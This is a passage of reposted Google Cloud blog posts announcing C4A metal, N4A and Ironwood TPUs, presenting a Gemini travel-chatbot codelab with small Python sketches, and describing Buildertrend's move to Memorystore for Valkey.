Operating as standard compute resources within your Virtual Private Cloud (VPC), C4A metal instances inherit and leverage the same security policies, audit logging, and network controls as virtual machines. Instances are designed to appear as physical servers to your toolchain and support common monitoring and security agents, allowing for straightforward integration with your existing Google Cloud environments. This integration extends to storage, where network-attached Hyperdisk allows you to manage persistent disks using the same snapshot and resizing tools your teams already use for your virtual machine fleet.

“For our build system, true isolation is paramount. Running on Google Cloud’s new C4A metal instance on Axion enables us to isolate our package builds with a strong hypervisor security boundary without compromising on build performance.” – Matthew Moore, Founder and CTO, Chainguard, Inc

Better together: the Axion C and N series

The addition of C4A metal to the Arm-based Axion portfolio allows customers to lower TCO by matching the right infrastructure to every workload. While Axion C4A virtual machines optimize for consistently high performance and N4A virtual machines (now in preview) optimize for price-performance and flexibility, C4A metal addresses the critical need for direct hardware access by specialized applications that require a non-virtualized Arm environment.

For example, an Android development company could create a highly efficient CI/CD pipeline by using C4A virtual machines for the build farm. For large-scale testing, they could use C4A metal to run Cuttlefish virtual devices directly on the physical hardware, eliminating nested virtualization overhead. To enable even higher fidelity, they can run Cuttlefish hybrid devices on C4A metal, reusing the system images from their physical hardware. Concurrently, supporting infrastructure such as CI/CD orchestrators and artifact repositories could run on cost-effective N4A instances, using Custom Machine Types to right-size resources and minimize operational expenses.

Coming soon to preview

C4A metal is scheduled for preview soon. Please fill out this form to sign up for early access and additional updates.


2025 11 06

GCP – Announcing Ironwood TPUs General Availability and new Axion VMs to power the age of inference

Tibor Kiss Cloud, Google Cloud gcp

Today’s frontier models, including Google’s Gemini, Veo, Imagen, and Anthropic’s Claude, train and serve on Tensor Processing Units (TPUs). For many organizations, the focus is shifting from training these models to powering useful, responsive interactions with them. Constantly shifting model architectures, the rise of agentic workflows, plus near-exponential growth in demand for compute, define this new age of inference. In particular, agentic workflows that require orchestration and tight coordination between general-purpose compute and ML acceleration are creating new opportunities for custom silicon and vertically co-optimized system architectures.

We have been preparing for this transition for some time and today, we are announcing the availability of three new products built on custom silicon that deliver exceptional performance, lower costs, and enable new capabilities for inference and agentic workloads:

Ironwood, our seventh generation TPU, will be generally available in the coming weeks. Ironwood is purpose-built for the most demanding workloads: from large-scale model training and complex reinforcement learning (RL) to high-volume, low-latency AI inference and model serving. It offers a 10X peak performance improvement over TPU v5p and more than 4X better performance per chip for both training and inference workloads compared to TPU v6e (Trillium), making Ironwood our most powerful and energy-efficient custom silicon to date.
New Arm®-based Axion instances. N4A, our most cost-effective N series virtual machine to date, is now in preview. N4A offers up to 2x better price-performance than comparable current-generation x86-based VMs. We are also pleased to announce C4A metal, our first Arm-based bare metal instance, will be coming soon in preview.

Ironwood and these new Axion instances are just the latest in a long history of custom silicon innovation at Google, including TPUs, Video Coding Units (VCU) for YouTube, and five generations of Tensor chips for mobile. In each case, we build these processors to enable breakthroughs in performance that are only possible through deep, system-level co-design, with model research, software, and hardware development under one roof. This is how we built the first TPU ten years ago, which in turn unlocked the invention of the Transformer eight years ago, the very architecture that powers most of modern AI. It has also influenced more recent advancements like our Titanium architecture, and advanced liquid cooling that we’ve deployed at gigawatt scale with fleet-wide uptime of ~99.999% since 2020.

Pictured: An Ironwood board showing three Ironwood TPUs connected to liquid cooling.

Pictured: Third-generation Cooling Distribution Units, providing liquid cooling to an Ironwood superpod.

Ironwood: The fastest path from model training to planet-scale inference

The early response to Ironwood has been overwhelmingly enthusiastic. Anthropic is drawn to the price-performance gains that accelerate its path from training massive Claude models to serving them to millions of users. In fact, Anthropic plans to access up to 1 million TPUs:

“Our customers, from Fortune 500 companies to startups, depend on Claude for their most critical work. As demand continues to grow exponentially, we’re increasing our compute resources as we push the boundaries of AI research and product development. Ironwood’s improvements in both inference performance and training scalability will help us scale efficiently while maintaining the speed and reliability our customers expect.” – James Bradbury, Head of Compute, Anthropic

Ironwood is being used by organizations of all sizes and across industries:

“Our mission at Lightricks is to define the cutting edge of open creativity, and that demands AI infrastructure that eliminates friction and cost at scale. We relied on Google Cloud TPUs and its massive ICI domain to achieve our breakthrough training efficiency for LTX-2, our leading open-source multimodal generative model. Now, as we enter the age of inference, our early testing makes us highly enthusiastic about Ironwood. We believe that Ironwood will enable us to create more nuanced, precise, and higher-fidelity image and video generation for our millions of global customers.” – Yoav HaCohen, Research Director, GenAI Foundational Models, Lightricks

“At Essential AI, our mission is to build powerful, open frontier models. We need massive, efficient scale, and Google Cloud’s Ironwood TPUs deliver exactly that. The platform was incredibly easy to onboard, allowing our engineers to immediately leverage its power and focus on accelerating AI breakthroughs.” – Philip Monk, Infrastructure Lead, Essential AI

System-level design maximizes inference performance, reliability, and cost

TPUs are a key component of AI Hypercomputer, our integrated supercomputing system that brings together compute, networking, storage, and software to improve system-level performance and efficiency. At the macro level, according to a recent IDC report, AI Hypercomputer customers achieved on average 353% three-year ROI, 28% lower IT costs, and 55% more efficient IT teams.

Ironwood TPUs will help customers push the limits of scale and efficiency even further. When you deploy TPUs, the system connects the individual chips to one another, creating a pod in which the interconnected TPUs work as a single unit. With Ironwood, we can scale up to 9,216 chips in a superpod linked with breakthrough Inter-Chip Interconnect (ICI) networking at 9.6 Tb/s. This massive connectivity allows thousands of chips to quickly communicate with each other and access a staggering 1.77 Petabytes of shared High Bandwidth Memory (HBM), overcoming data bottlenecks for even the most demanding models.
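
As a quick sanity check on those figures, dividing the shared HBM by the chip count gives the memory attached to each chip. The sketch below assumes decimal units (1 PB = 1,000,000 GB), which the post does not state:

```python
CHIPS_PER_SUPERPOD = 9_216   # from the text
SHARED_HBM_PB = 1.77         # from the text
GB_PER_PB = 1_000_000        # assumption: decimal (SI) units


def hbm_per_chip_gb(total_pb=SHARED_HBM_PB, chips=CHIPS_PER_SUPERPOD):
    """Average HBM per chip in GB, given the superpod totals."""
    return total_pb * GB_PER_PB / chips


print(round(hbm_per_chip_gb()))  # about 192 GB per chip
```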

Pictured: Part of an Ironwood superpod, directly connecting 9,216 Ironwood TPUs in a single domain.

At that scale, services demand uninterrupted availability. That’s why our Optical Circuit Switching (OCS) technology acts as a dynamic, reconfigurable fabric, instantly routing around interruptions to restore the workload while your services keep running. And when you need more power, Ironwood scales across pods into clusters of hundreds of thousands of TPUs.

Pictured: Jupiter data center network enables the connection of multiple Ironwood superpods into clusters of hundreds of thousands of TPUs.

The AI Hypercomputer advantage: Hardware and software co-designed for faster, more efficient outcomes

On top of this hardware is a co-designed software layer, where our goal is to maximize Ironwood’s massive processing power and memory, and make it easy to use throughout the AI lifecycle.

To improve fleet efficiency and operations, we’re excited to announce that TPU customers can now benefit from Cluster Director capabilities in Google Kubernetes Engine. This includes advanced maintenance and topology awareness for intelligent scheduling and highly resilient clusters.
For pre-training and post-training, we’re also sharing new enhancements to MaxText, a high-performance, open source LLM framework, to make it easier to implement the latest training and reinforcement learning optimization techniques, such as Supervised Fine-Tuning (SFT) and Group Relative Policy Optimization (GRPO).
For inference, we recently announced enhanced support for TPUs in vLLM, allowing developers to switch between GPUs and TPUs, or run both, with only a few minor configuration changes, and GKE Inference Gateway, which intelligently load balances across TPU servers to reduce time-to-first-token (TTFT) latency by up to 96% and serving costs by up to 30%.

Our software layer is what enables AI Hypercomputer’s high performance and reliability for training, tuning, and serving demanding AI workloads at scale. Thanks to deep integrations across the stack, from data-center-wide hardware optimizations to open software and managed services, Ironwood TPUs are our most powerful and energy-efficient TPUs to date. Learn more about our approach to hardware and software co-design here.

Axion: Redefining general-purpose compute

Building and serving modern applications requires both highly specialized accelerators and powerful, efficient general-purpose compute. This was our vision for Axion, our custom Arm Neoverse®-based CPUs, which we designed to deliver compelling performance, cost and energy efficiency for everyday workloads.

Today, we are expanding our Axion portfolio with:

N4A (preview), our second general-purpose Axion VM, which is ideal for microservices, containerized applications, open-source databases, batch, data analytics, development environments, experimentation, data preparation and web serving jobs that make AI applications possible. Learn more about N4A here.
C4A metal (in preview soon), our first Arm-based bare-metal instance, which provides dedicated physical servers for specialized workloads such as Android development, automotive in-car systems, software with strict licensing requirements, scale test farms, or running complex simulations. Learn more about C4A metal here.

With today’s announcements, the Axion portfolio now includes three powerful options: N4A, C4A, and C4A metal. Together, the C and N series allow you to lower the total cost of running your business without compromising on performance or workload-specific requirements.

Axion-based instance	Optimized for	Key features
N4A (preview)	Price-performance and flexibility	Up to 64 vCPUs, 512 GB of DDR5 memory, and 50 Gbps networking, with support for Custom Machine Types and Hyperdisk Balanced and Throughput storage.
C4A metal (in preview soon)	Specialized workloads, such as hypervisors and native Arm development	Up to 96 vCPUs, 768 GB of DDR5 memory, Hyperdisk storage, and up to 100 Gbps of networking.
C4A	Consistently high performance	Up to 72 vCPUs, 576 GB of DDR5 memory, 100 Gbps of Tier 1 networking, Titanium SSD with up to 6 TB of local capacity, advanced maintenance controls, and support for Hyperdisk Balanced, Throughput, and Extreme.
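
Read together, the maximum shapes in the table all work out to the same ratio of 8 GB of memory per vCPU. A small sketch of that arithmetic, using only the "up to" figures listed above (smaller shapes and Custom Machine Types may differ):

```python
# Maximum vCPU and memory (GB) figures copied from the table above.
MAX_SHAPES = {
    "N4A": (64, 512),
    "C4A metal": (96, 768),
    "C4A": (72, 576),
}


def gb_per_vcpu(vcpus, memory_gb):
    """Memory available per vCPU at a given shape."""
    return memory_gb / vcpus


for name, (vcpus, memory_gb) in MAX_SHAPES.items():
    print(f"{name}: {gb_per_vcpu(vcpus, memory_gb):.0f} GB per vCPU")
```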

Axion’s inherent efficiency also makes it a valuable option for modern AI workflows. While specialized accelerators like Ironwood handle the complex task of model serving, Axion excels at the operational backbone: supporting high-volume data preparation, ingestion, and running application servers that host your intelligent applications. Axion is already translating into customer impact.

A powerful combination for AI and everyday computing

To thrive in an era with constantly shifting model architectures, software, and techniques, you need a combination of purpose-built AI accelerators for model training and serving, alongside efficient, general-purpose CPUs for the everyday workloads, including the workloads that support those AI applications.

Ultimately, whether you use Ironwood and Axion together or mix and match them with the other compute options available on AI Hypercomputer, this system-level approach gives you the ultimate flexibility and capability for the most demanding workloads. Sign up to test Ironwood, Axion N4A, or C4A metal today.


2025 11 06

GCP – Your First AI Application is Easier Than You Think

Tibor Kiss Cloud, Google Cloud gcp

If you’re a developer, you’ve seen generative AI everywhere. It can feel like a complex world of models and advanced concepts. It can be difficult to know where to actually start.

The good news is that building your first AI-powered application is more accessible than you might imagine. You don’t need to be an AI expert to get started. This post introduces a new codelab designed to bridge this gap and provide you with a first step. We’ll guide you through the entire process of building a functional, interactive travel chatbot using Google’s Gemini model.

Dive into the codelab and build your first AI application today!

Setting the Stage: Your First Project

In this codelab, you’ll step into the role of a developer at a travel company tasked with building a new chat application. You’ll start with a basic web application frontend and, step-by-step, you will bring it to life by connecting it to the power of generative AI.

By the end, you will have built a travel assistant that can:

Answer questions about travel destinations.
Provide personalized recommendations.
Fetch real-time data, like the weather, to give genuinely helpful advice.

The process is broken down into a few key stages.

Making the First Connection

Before you can do anything fancy, you need to get your application talking to the AI model. An easy way to do this is with the Vertex AI SDK, a complete library for interacting with the Vertex AI platform.

While the Vertex AI SDK is a powerful tool for the full machine learning lifecycle, this lab focuses on one of its most-used tools: building generative AI applications. This part of the Vertex AI SDK acts as the bridge between your application and the Gemini model. Without it, you would have to manually handle all the complex wiring yourself—writing code to manage authentication, formatting intricate API requests, and parsing the responses. The Vertex AI SDK handles all that complexity for you so you can focus on what you actually want to do: send a message and get a response.

In this codelab, you’ll see just how simple it is.
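
As a rough idea of what that first connection can look like, here is a minimal sketch. It assumes the Google Gen AI SDK for Python (the google-genai package) pointed at Vertex AI, which may not be the exact library the codelab uses; the default region and model name are placeholders to replace with your own:

```python
def ask_gemini(prompt, project, location="us-central1",
               model="gemini-2.5-flash"):
    """Send one prompt to Gemini on Vertex AI and return the text reply.

    Requires `pip install google-genai` and application default
    credentials for the given project.
    """
    # Imported here so the module loads even before the SDK is installed.
    from google import genai

    # The client handles authentication and request formatting.
    client = genai.Client(vertexai=True, project=project, location=location)
    response = client.models.generate_content(model=model, contents=prompt)
    return response.text
```

Calling ask_gemini("Suggest three things to do in Lisbon", project="my-project-id") would return the model's reply as a string; my-project-id is a hypothetical project ID.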

Giving your AI purpose with system instructions

Once your app is connected, you’ll notice the AI’s responses won’t be tailored to your purposes yet. One way you can make it more useful for your specific use case is by giving it system instructions.
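
A hedged sketch of how a system instruction might be attached to a request, again assuming the google-genai package rather than the codelab's exact code. The instruction text, default region, and model name are illustrative placeholders:

```python
SYSTEM_INSTRUCTION = (
    "You are a sophisticated and friendly travel assistant. "
    "Answer questions about destinations and give personalized "
    "recommendations. Politely decline topics unrelated to travel."
)


def ask_travel_assistant(prompt, project, location="us-central1",
                         model="gemini-2.5-flash"):
    """Send a prompt to Gemini with the travel-assistant system instruction."""
    # Imported lazily; requires `pip install google-genai`.
    from google import genai
    from google.genai import types

    client = genai.Client(vertexai=True, project=project, location=location)
    response = client.models.generate_content(
        model=model,
        contents=prompt,
        # The system instruction is passed in the request config,
        # separate from the user's prompt.
        config=types.GenerateContentConfig(
            system_instruction=SYSTEM_INSTRUCTION,
        ),
    )
    return response.text
```

Keeping the instruction in a single constant makes it easy to iterate on the wording without touching the request code.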

Hot Tip: Use Google AI Studio to Create Your System Instructions

A great way to develop your system instructions is to leverage Gemini as a creative partner to draft them for you. For example, you could ask Gemini in Google AI Studio to generate a thorough set of instructions for a “sophisticated and friendly travel assistant.”

Once you have a draft, you can immediately test it, also in Google AI Studio. Start a new chat and in the panel to the right, set the Gemini model to the one you’re using in your app and paste the text into the system instruction field. This allows you to quickly interact with the model and see how it behaves with your instructions, all without writing any code. When you’re happy with the results, you can copy the final version directly into your application.

Connecting Your AI to the Real World

This is where you break the model out of its knowledge silo and connect it to live data. By default, an AI model’s knowledge is limited to the data it was trained on; it doesn’t know today’s weather. However, you can provide Gemini with access to external knowledge using a powerful feature called function calling!

The concept is simple: you write a basic Python function (like one to check the weather) and then describe that tool to the model. Then, when a user asks about the weather, the model can ask your application to run your function and use the live result in its answer. This allows the model to answer questions far beyond its training data, making it a much more powerful and useful assistant with access to up-to-the-minute information.
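
The round trip described above can be sketched without any SDK. In the example below the model's request is simulated as a plain dictionary, the weather lookup is a stub returning canned data, and the declaration format is a generic JSON-Schema-style description. All names here are hypothetical; a real app would take the call from the SDK's response and query a live weather service:

```python
def get_weather(city):
    """Stub tool: a real version would call a weather API for `city`."""
    canned = {"Paris": "18C, light rain", "Cairo": "34C, sunny"}
    return {"city": city, "forecast": canned.get(city, "unknown")}


# Description handed to the model so it knows the tool exists
# and which arguments it takes.
WEATHER_TOOL = {
    "name": "get_weather",
    "description": "Get the current weather forecast for a city.",
    "parameters": {
        "type": "object",
        "properties": {"city": {"type": "string"}},
        "required": ["city"],
    },
}

# Maps tool names the model may request to local Python callables.
TOOL_REGISTRY = {"get_weather": get_weather}


def run_function_call(call):
    """Execute a model-issued call of the form {"name": ..., "args": {...}}."""
    func = TOOL_REGISTRY.get(call["name"])
    if func is None:
        raise ValueError(f"model requested unknown tool: {call['name']}")
    return func(**call["args"])


# Simulated model turn: the model asks the app to run the tool.
simulated_call = {"name": "get_weather", "args": {"city": "Paris"}}
result = run_function_call(simulated_call)
# `result` would be sent back to the model, which uses it in its answer.
```

The registry lookup means the application, not the model, decides which functions can actually run, which keeps an unexpected tool name from executing arbitrary code.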

In this lab, we used the Geocoding API and the Weather Forecast API to provide the app with the ability to factor in the weather when answering questions about travel.

Your Journey Starts Here

Building with AI isn’t about knowing everything at once. It’s about taking the first step, building something tangible, and learning key concepts along the way. This codelab was designed to be that first step. By the end, you won’t just have a working travel chatbot—you’ll have hands-on experience with the fundamental building blocks of a production-ready AI application. You’ll be surprised at what you can build.

Share your progress and connect with others on the journey using the hashtag #ProductionReadyAI. Happy learning!


2025 11 05

GCP – How Buildertrend Drives Innovation with Memorystore for Valkey

Tibor Kiss Cloud, Google Cloud gcp

Editor’s note: Today we hear from Buildertrend, a leading provider of cloud-based construction management software. Since 2006, the platform has helped more than a million users globally simplify business management, track financials, and improve communication. To support this massive scale and their ambitious vision, they rely on a robust technology stack on Google Cloud, including, recently, Memorystore for Valkey. Read on to hear about their migration from Memorystore for Redis to the new platform.

Running a construction business is a complex balancing act that requires a constant stream of real-time information to keep projects on track. At Buildertrend, we understand the challenges our customers face — from fluctuating material costs and supply chain delays to managing tight deadlines and the risk of budget overruns — and work to help construction professionals improve efficiency, reduce risk, and enhance collaboration, all while growing their bottom line.

The challenge: Caching at scale

The construction industry has historically been slow to adopt new technologies, hindering efficiency and scalability. At Buildertrend, we aim to change this by being at the forefront of adopting new technology. When Memorystore for Valkey became generally available, we spent time looking into whether it could help us modernize our stack and deliver value to customers. We were attracted by Valkey’s truly open source posture and its promised performance benefits over competing technologies.

Before adopting Memorystore for Valkey, we had used Memorystore for Redis. While it served our basic needs, we found ourselves hitting a wall when it came to a critical feature: native cross-regional replication. As we scaled, we needed a solution that could support a global user base and provide seamless failover in case of a disaster or other issues within a region. We also needed a modern connectivity model such as Google Cloud’s Private Service Connect to enhance network security and efficiency.

As a fully managed, scalable, and highly available in-memory data store, Memorystore for Valkey offered the key features we needed out of the box to take our platform to the next level.

A modern solution for a modern problem

Within this ecosystem, we use Memorystore for Valkey for a variety of critical functions, including:

Database-backed cache: Speeds up data retrieval for a faster user experience
Session state: Manages user sessions for web applications
Job storage: Handles asynchronous task queues for background processes
Pub/Sub idempotency keys: Ensures messages are processed exactly once, preventing data duplication
Authentication tokens: Securely validates user identity with cryptographically signed tokens, enabling fast, scalable authentication

Using the cache in these scenarios keeps our application fast, resilient, and ready to meet the demands of our growing customer base. Native cross-regional replication lets us support a global user base without having to worry about keeping global caches in sync.
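
The idempotency-key pattern in the list above typically relies on an atomic "set if not exists" write with an expiry. A minimal sketch, assuming a client whose set(name, value, nx=True, ex=seconds) call behaves like the one in redis-py and valkey-py (returning a truthy value only when the key was newly created). The in-memory class is a stand-in so the example runs without a server, and the key prefix and TTL are illustrative, not Buildertrend's actual values:

```python
import time


class InMemoryStore:
    """Tiny stand-in for a Valkey client; supports only set(..., nx, ex)."""

    def __init__(self):
        self._data = {}  # key -> (value, expiry timestamp)

    def set(self, name, value, nx=False, ex=None):
        now = time.monotonic()
        current = self._data.get(name)
        exists = current is not None and current[1] > now
        if nx and exists:
            return None  # key already present: do not overwrite
        expiry = now + ex if ex is not None else float("inf")
        self._data[name] = (value, expiry)
        return True


def process_once(store, message_id, handler, ttl_seconds=3600):
    """Run handler only for the first delivery of message_id.

    Returns True if the handler ran, False for a duplicate delivery.
    """
    claimed = store.set(f"idem:{message_id}", "1", nx=True, ex=ttl_seconds)
    if not claimed:
        return False
    handler(message_id)
    return True
```

This sketch claims the key before running the handler, so a handler that crashes would block retries until the key expires; production code usually deletes the key on failure or records completion separately.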

A seamless migration with minimal disruption

Migrating from Memorystore for Redis to Memorystore for Valkey was a smooth process, thanks to close collaboration with the Google Cloud team. We worked with the Google Cloud team to identify the best approach, which for us involved exporting data to Google Cloud Storage and seeding the data at Valkey instance creation, allowing us to migrate with minimal downtime. Because Memorystore for Valkey natively supports Private Service Connect, we were able to eliminate a proxy layer that our engineers used to connect to our Memorystore for Redis instances, simplifying our stack and improving our networking posture.

Looking ahead to a global future

Although it’s still early in our journey, the impact is already clear. Memorystore for Valkey has unlocked our ability to scale and drastically reduced our time to market. It has allowed our team to streamline and own deployment processes, so they can be more agile and responsive.

For us, the future is about global scalability. With nearly 300 Memorystore for Valkey instances in our fleet, we’re building a globally available, cloud-native stack. Our most critical instances are highly optimized to serve up to 30,000 requests per second each, demonstrating the foundation’s scalability and performance.

We strive to use scalable cloud-native technologies, and Memorystore for Valkey will enable us to continue down this path. By using the Memorystore for Valkey managed service, we not only solve technical problems, but also accelerate business growth and empower engineering teams to focus on what matters most: building great products.

Ready to build with Memorystore for Valkey?

Like Buildertrend, you can leverage the power of a fully managed, scalable, and highly available in-memory data store to accelerate your applications and empower your development teams.

To get started, explore the Memorystore for Valkey documentation and sign up for a Google Cloud account!
